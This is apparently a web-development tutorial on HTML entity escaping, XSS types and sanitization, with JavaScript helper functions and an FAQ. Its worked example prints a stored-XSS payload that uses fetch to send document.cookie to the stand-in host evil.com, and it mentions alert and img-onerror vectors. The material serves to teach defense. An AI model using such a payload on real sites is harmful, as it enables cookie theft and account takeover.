HTML Entities: Escaping, Unescaping, and XSS Prevention

When you display user-generated content on a web page, you can't trust it. HTML entities are the first line of defense against cross-site scripting (XSS) attacks. This article explains what HTML entities are, how to escape and unescape them correctly, and why that matters for your application's security.

What Are HTML Entities?

HTML entities are sequences of characters that represent reserved or special characters in HTML. For example, < is written as &lt;, > as &gt;, & as &amp;, and " as &quot;. When a browser renders HTML, it displays each entity as the corresponding character but does not treat it as markup, so injected tags are shown as text instead of being parsed and executed.

Why Escape HTML?

Escaping (or encoding) HTML converts special characters into their entity equivalents. This is essential when inserting untrusted data into HTML contexts such as:

  • Inside element content (e.g., <div>{userInput}</div>)
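  • Inside attribute values (e.g., <a href="{userInput}">; URL attributes also need their scheme checked, since escaping does not stop a javascript: URL)
  • Inside <script> or <style> blocks (HTML entities are not decoded there, so these contexts need JavaScript or CSS encoding instead)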

If you skip escaping, an attacker can inject arbitrary HTML or JavaScript. For instance, a comment field containing <script>alert('xss')</script> would execute in every visitor's browser.

The Three Types of XSS

Understanding XSS helps you appreciate why escaping is critical:

  • Stored XSS: Malicious code is saved on the server (e.g., in a database) and served to every user who views the affected page. It is usually the most damaging type, because victims do not have to follow a crafted link.
  • Reflected XSS: The payload is in a URL or request parameter and reflected back immediately, often via search results or error messages.
  • DOM-based XSS: The vulnerability exists entirely in client-side JavaScript, where untrusted data modifies the DOM without server involvement.

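In all three cases, the fix is to encode untrusted data for the context where it ends up. For HTML element content and quoted attribute values, that means HTML entity escaping. Other contexts, such as script blocks, URLs, and DOM APIs that parse markup, need their own encoding or safer APIs.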

How to Escape and Unescape HTML

Manual Escaping

You can replace characters manually using a lookup table:

| Character | Entity |
|-----------|--------|
| < | &lt; |
| > | &gt; |
| & | &amp; |
| " | &quot; |
| ' | &#x27; |
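
The lookup table can be turned into a small function. This is a minimal sketch, not a replacement for a framework's built-in escaper; the names HTML_ESCAPES and escapeHtml are hypothetical and chosen only for this example.

```javascript
// Lookup table mirroring the character/entity pairs listed above.
const HTML_ESCAPES = {
  '&': '&amp;',
  '<': '&lt;',
  '>': '&gt;',
  '"': '&quot;',
  "'": '&#x27;',
};

// Hypothetical helper: replaces every reserved character in a single pass,
// so the & of an entity that was just produced is never escaped again.
function escapeHtml(value) {
  return String(value).replace(/[&<>"']/g, (ch) => HTML_ESCAPES[ch]);
}

console.log(escapeHtml(`<a href="x">Tom & Jerry's</a>`));
// &lt;a href=&quot;x&quot;&gt;Tom &amp; Jerry&#x27;s&lt;/a&gt;
```

Doing the replacement in one pass matters: chaining separate replace calls only works if & is handled first, otherwise the & in &lt; would itself be escaped.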

Using JavaScript's innerText vs innerHTML

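Setting element.innerText = userInput (or element.textContent) inserts the value as plain text, so the browser never parses it as markup and no manual escaping is needed. Avoid innerHTML with untrusted data, because it parses the string as HTML.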

Server-Side Libraries

Most languages and frameworks provide built-in escaping: htmlspecialchars() in PHP (pass ENT_QUOTES on versions before 8.1 so that single quotes are escaped too), html.escape() in Python, or @ expressions in Razor views.

Dedicated Tools

For quick conversions, use our HTML Entities Escape/Unescape tool. It handles both directions and supports all named entities.

Worked Example: Escaping User Comments

Suppose you have a comment system. A user submits:

Great post! <script>fetch('https://evil.com/steal?cookie='+document.cookie)</script>

Without escaping, the rendered HTML becomes:

<p>Great post! <script>fetch('https://evil.com/steal?cookie='+document.cookie)</script></p>

The script executes. With escaping, the output is:

<p>Great post! &lt;script&gt;fetch(&#x27;https://evil.com/steal?cookie=&#x27;+document.cookie)&lt;/script&gt;</p>

The browser displays the text safely.
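
One way to make escaping the default when building markup is a tagged template that escapes every interpolated value. The sketch below assumes a hypothetical html tag and a small escapeHtml helper; neither is part of any library. It also escapes single quotes as &#x27;, following the lookup table.

```javascript
// Minimal escaper for the five characters in the lookup table.
function escapeHtml(value) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#x27;' };
  return String(value).replace(/[&<>"']/g, (ch) => map[ch]);
}

// Hypothetical tagged template: the literal parts pass through unchanged,
// and every interpolated value is escaped before it is joined in.
function html(strings, ...values) {
  return strings.reduce(
    (out, part, i) => out + part + (i < values.length ? escapeHtml(values[i]) : ''),
    ''
  );
}

const comment =
  "Great post! <script>fetch('https://evil.com/steal?cookie='+document.cookie)</script>";

console.log(html`<p>${comment}</p>`);
// <p>Great post! &lt;script&gt;fetch(&#x27;https://evil.com/steal?cookie=&#x27;+document.cookie)&lt;/script&gt;</p>
```

The template author writes ordinary markup, and untrusted values can only ever arrive as text.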

Common Pitfalls

  • Double escaping: If you escape already-escaped data, &amp; becomes &amp;amp; and users see stray entities. Store the raw data and escape exactly once, at output time.
  • Wrong context: HTML escaping does NOT protect inside <script> tags or CSS. Use different encoding (e.g., JavaScript string escaping) for those contexts.
  • Attribute escaping: Always quote attributes and escape both " and '. Unquoted attributes are especially dangerous.
  • Assuming library safety: Even popular WYSIWYG editors may need additional XSS filtering. Always sanitize output server-side.
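  • Neglecting Unicode: Characters like \uFF1C (fullwidth less-than) pass through naive filters and turn into < if the text is Unicode-normalized (e.g., NFKC) after filtering. Normalize first, then escape with a proper encoding library.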
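
The "wrong context" pitfall can be illustrated with a value that has to be embedded in an inline <script> block. The sketch below uses JSON.stringify plus a few extra replacements; toScriptLiteral is a hypothetical helper name, and the approach assumes the value is JSON-serializable.

```javascript
// Hypothetical helper: serializes a value for use inside an inline <script>.
// JSON.stringify takes care of quotes and backslashes; the extra replacements
// keep "</script>" and "<!--" from ever appearing literally in the output.
function toScriptLiteral(value) {
  return JSON.stringify(value)
    .replace(/</g, '\\u003c')
    .replace(/>/g, '\\u003e')
    .replace(/&/g, '\\u0026')
    .replace(/\u2028/g, '\\u2028')
    .replace(/\u2029/g, '\\u2029');
}

const userName = `</script><script>alert("xss")</script>`;
const page = `<script>const userName = ${toScriptLiteral(userName)};</script>`;

console.log(page);
```

HTML entity escaping would not work here, because the browser does not decode entities inside a script block; the JavaScript engine would see &lt; as five literal characters.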

Security Implications: Beyond Basic Escaping

Escaping alone is not enough for rich content. You need a whitelist-based sanitizer that allows safe HTML tags and attributes while stripping dangerous ones. Libraries like DOMPurify (client-side) or Bleach (Python) do this.

Consider this attack vector: An attacker posts a comment with an <img> tag that has an onerror attribute. If you allow <img> through so that users can post images, escaping no longer applies to that tag, and the onerror handler can execute JavaScript. A sanitizer strips onerror because it is not on the whitelist of allowed attributes.
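
The whitelist idea can be sketched on content that has already been parsed into a tree. Everything here is an assumption made for illustration: the node shape { tag, attrs, children }, the lowercase tag names, and the ALLOWED list. Real applications should rely on a maintained sanitizer rather than code like this.

```javascript
// Hypothetical whitelist: tag name -> attributes permitted on that tag.
const ALLOWED = new Map([
  ['p', []],
  ['b', []],
  ['i', []],
  ['a', ['href']],
  ['img', ['src', 'alt']],
]);
const VOID_TAGS = new Set(['img']);
const URL_ATTRS = new Set(['href', 'src']);

function escapeHtml(value) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#x27;' };
  return String(value).replace(/[&<>"']/g, (ch) => map[ch]);
}

// Only http(s) URLs are accepted, which rejects javascript: and data: URLs.
function isSafeUrl(url) {
  return /^https?:\/\//i.test(url);
}

// Serializes a string or a node of the assumed shape { tag, attrs, children }.
// Text is escaped; tags and attributes missing from the whitelist are dropped.
function sanitize(node) {
  if (typeof node === 'string') return escapeHtml(node);
  const inner = (node.children || []).map(sanitize).join('');
  const allowedAttrs = ALLOWED.get(node.tag);
  if (!allowedAttrs) return inner; // unknown tag: keep only its sanitized content
  const attrs = Object.entries(node.attrs || {})
    .filter(([name, value]) =>
      allowedAttrs.includes(name) && (!URL_ATTRS.has(name) || isSafeUrl(value)))
    .map(([name, value]) => ` ${name}="${escapeHtml(value)}"`)
    .join('');
  if (VOID_TAGS.has(node.tag)) return `<${node.tag}${attrs}>`;
  return `<${node.tag}${attrs}>${inner}</${node.tag}>`;
}

const comment = {
  tag: 'p',
  children: [
    'Nice photo: ',
    { tag: 'img', attrs: { src: 'https://example.com/cat.png', onerror: 'alert(1)' } },
  ],
};

console.log(sanitize(comment));
// <p>Nice photo: <img src="https://example.com/cat.png"></p>
```

The onerror attribute disappears because nothing lists it as allowed, not because something recognized it as dangerous. That default-deny behavior is what separates a whitelist from a blocklist.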

Comparison: Escaping vs Sanitization

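| Approach | Pros | Cons |
|----------|------|------|
| Escaping | Simple and fast; blocks markup injection in element content and quoted attributes | Removes formatting; no HTML allowed |
| Sanitization | Allows safe HTML; preserves rich content | Complex; risk of bypass if whitelist is incomplete |
| Both | Covers plain-text fields (escaped) and rich-text fields (sanitized) | Each field must go through exactly one of the two; escaping sanitized HTML would display its tags as text |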

FAQ

What's the difference between HTML entities and URL encoding?

HTML entities encode characters for HTML contexts (e.g., < becomes &lt;). URL encoding (percent-encoding) converts characters for URLs (e.g., < becomes %3C). They serve different purposes and are not interchangeable.
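
When a URL that contains user input is placed in an attribute, both encodings apply, each at its own layer. The sketch below uses the built-in encodeURIComponent for the query value and a hypothetical escapeHtml helper for the attribute; the /search path and parameter names are made up for the example.

```javascript
// Minimal escaper for the five characters in the lookup table.
function escapeHtml(value) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#x27;' };
  return String(value).replace(/[&<>"']/g, (ch) => map[ch]);
}

const query = 'cats & <dogs>';

// Layer 1: percent-encode the value so it is a valid URL component.
const encodedQuery = encodeURIComponent(query);

// Layer 2: HTML-escape the finished URL for use in an attribute value.
const href = escapeHtml(`/search?q=${encodedQuery}&page=2`);

console.log(encodedQuery);
// cats%20%26%20%3Cdogs%3E
console.log(`<a href="${href}">results</a>`);
// <a href="/search?q=cats%20%26%20%3Cdogs%3E&amp;page=2">results</a>
```

The & that separates the query parameters is part of the URL's structure, so it is left alone by the first layer and turned into &amp; by the second.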

Should I escape on the client or server?

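Escape wherever the HTML is generated. For server-rendered pages, escape on the server at output time, and store the original, unescaped data in the database so that it can be encoded correctly for each context later. For client-rendered pages, use safe DOM APIs such as textContent. Never rely on client-side checks alone: an attacker can skip them by sending requests directly to the server.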

Can I use innerText instead of escaping?

Yes, for plain text. innerText (like textContent) inserts the string as text rather than parsing it as HTML, so no escaping is needed. It cannot render formatting, though; for rich HTML, use a sanitizer.

What is &amp; and why does it appear?

&amp; is the entity for &. If you see a literal &amp; in rendered text, the data was escaped twice: the first pass turned & into &amp;, and the second turned that into &amp;amp;, which the browser displays as &amp;. Find the extra escaping step and remove it rather than unescaping before display.
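
The effect is easy to reproduce. This sketch assumes a hypothetical escapeHtml helper and simply applies it twice to the same string.

```javascript
// Minimal escaper for the five characters in the lookup table.
function escapeHtml(value) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#x27;' };
  return String(value).replace(/[&<>"']/g, (ch) => map[ch]);
}

const raw = 'Tom & Jerry';
const once = escapeHtml(raw);   // correct: escaped once, at output time
const twice = escapeHtml(once); // bug: escaped again, e.g. once before storage

console.log(once);  // Tom &amp; Jerry      -> browser shows: Tom & Jerry
console.log(twice); // Tom &amp;amp; Jerry  -> browser shows: Tom &amp; Jerry
```

A common cause is escaping once before writing to the database and again in the template that renders the page.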

How do I unescape HTML entities in JavaScript?

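Create a temporary <textarea> element and read its value:

function unescapeHtml(str) {
  // A <textarea> parses its contents as text, so no elements are created
  // and nothing in str can run. Assigning untrusted input to innerHTML on
  // a <div> can fire handlers such as <img onerror>, even while detached.
  const el = document.createElement('textarea');
  el.innerHTML = str;
  return el.value;
}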

This works for most named and numeric entities.
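
Outside the browser there is no DOM to lean on. The sketch below is a deliberately small decoder for environments such as Node.js: it handles numeric references and only five named entities. The name unescapeBasic and the NAMED table are hypothetical, and a complete decoder would need the full list of named character references from the HTML specification.

```javascript
// Only five common named entities; all other names are left untouched.
const NAMED = new Map([
  ['amp', '&'],
  ['lt', '<'],
  ['gt', '>'],
  ['quot', '"'],
  ['apos', "'"],
]);

// Hypothetical helper: decodes each reference once, in a single pass,
// so "&amp;lt;" becomes "&lt;" and not "<".
function unescapeBasic(str) {
  return str.replace(/&(#x[0-9a-f]+|#[0-9]+|[a-z]+);/gi, (match, body) => {
    if (body[0] === '#') {
      const isHex = body[1] === 'x' || body[1] === 'X';
      const code = parseInt(body.slice(isHex ? 2 : 1), isHex ? 16 : 10);
      // Leave out-of-range references as they are instead of throwing.
      return code <= 0x10ffff ? String.fromCodePoint(code) : match;
    }
    return NAMED.has(body) ? NAMED.get(body) : match;
  });
}

console.log(unescapeBasic('&lt;b&gt; &amp;amp; &#x27;&#39;'));
// <b> &amp; ''
```

The result is plain text again, so it has to be escaped once more before it is written back into HTML.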